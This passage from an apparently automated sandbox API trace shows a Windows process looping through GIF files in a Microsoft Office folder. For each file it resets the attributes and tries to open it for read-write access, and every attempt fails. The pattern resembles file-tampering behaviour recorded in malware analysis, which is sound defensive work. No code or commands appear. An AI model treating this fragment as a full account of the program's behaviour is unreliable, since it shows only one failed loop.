(lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.349] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR11F.GIF", dwFileAttributes=0x80) returned 0 [0136.349] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR11F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir11f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.349] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.349] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.349] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.349] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.350] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR12F.GIF", dwFileAttributes=0x80) returned 0 [0136.350] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR12F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir12f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.350] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.350] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.350] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.350] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.350] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR13F.GIF", dwFileAttributes=0x80) returned 0 [0136.351] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR13F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir13f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.351] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.351] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.351] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.351] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.351] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR14F.GIF", dwFileAttributes=0x80) returned 0 [0136.351] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR14F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir14f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.352] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.352] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.352] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.352] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.352] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR15F.GIF", dwFileAttributes=0x80) returned 0 [0136.352] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR15F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir15f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.352] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.352] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.352] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.352] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.353] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR16F.GIF", dwFileAttributes=0x80) returned 0 [0136.353] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR16F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir16f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.353] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.353] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.353] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.353] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.353] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR17F.GIF", dwFileAttributes=0x80) returned 0 [0136.354] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR17F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir17f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.354] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.354] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.354] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.354] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.354] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR18F.GIF", dwFileAttributes=0x80) returned 0 [0136.354] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR18F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir18f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.354] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.354] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.355] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.355] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.355] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR19F.GIF", dwFileAttributes=0x80) returned 0 [0136.355] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR19F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir19f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.355] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.355] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.355] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.355] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.355] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR1B.GIF", dwFileAttributes=0x80) returned 0 [0136.355] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR1B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir1b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.355] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.356] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.356] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.356] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.356] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR1F.GIF", dwFileAttributes=0x80) returned 0 [0136.357] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR1F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir1f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.357] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.357] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.357] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.357] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.357] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR20F.GIF", dwFileAttributes=0x80) returned 0 [0136.357] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR20F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir20f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.357] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.357] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.357] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.357] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.358] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR21F.GIF", dwFileAttributes=0x80) returned 0 [0136.358] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR21F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir21f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.358] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.358] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.358] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.358] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.358] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR22F.GIF", dwFileAttributes=0x80) returned 0 [0136.358] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR22F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir22f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.358] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.359] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.359] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.359] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.359] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR23F.GIF", dwFileAttributes=0x80) returned 0 [0136.359] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR23F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir23f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.360] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.360] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.360] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.360] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.360] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR24F.GIF", dwFileAttributes=0x80) returned 0 [0136.360] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR24F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir24f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.360] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.360] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.360] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.360] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.361] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR25F.GIF", dwFileAttributes=0x80) returned 0 [0136.361] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR25F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir25f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.361] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.361] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.361] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.361] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.361] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR26F.GIF", dwFileAttributes=0x80) returned 0 [0136.361] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR26F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir26f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.361] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.361] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.361] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.361] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.362] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR27F.GIF", dwFileAttributes=0x80) returned 0 [0136.362] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR27F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir27f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.362] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.362] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.363] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.363] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.363] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR28B.GIF", dwFileAttributes=0x80) returned 0 [0136.363] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR28B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir28b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.363] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.363] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.363] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.363] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.363] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR28F.GIF", dwFileAttributes=0x80) returned 0 [0136.363] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR28F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir28f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.364] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.364] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.364] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.364] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.364] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR29B.GIF", dwFileAttributes=0x80) returned 0 [0136.364] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR29B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir29b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.364] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.364] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.364] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.364] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.365] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR29F.GIF", dwFileAttributes=0x80) returned 0 [0136.365] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR29F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir29f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.365] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.365] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.365] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.365] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.366] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR2B.GIF", dwFileAttributes=0x80) returned 0 [0136.366] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR2B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir2b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.366] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.366] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.366] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.366] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.366] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR2F.GIF", dwFileAttributes=0x80) returned 0 [0136.366] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR2F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir2f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.366] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.366] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.367] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.367] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.367] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR30B.GIF", dwFileAttributes=0x80) returned 0 [0136.367] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR30B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir30b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.367] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.367] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.367] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.367] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.367] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR30F.GIF", dwFileAttributes=0x80) returned 0 [0136.368] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR30F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir30f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.368] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.368] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.368] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.368] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.369] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR31B.GIF", dwFileAttributes=0x80) returned 0 [0136.369] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR31B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir31b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.369] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.369] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.369] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.369] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.369] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR31F.GIF", dwFileAttributes=0x80) returned 0 [0136.369] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR31F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir31f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.369] CloseHandle (hObject=0xffffffffffffffff) returned 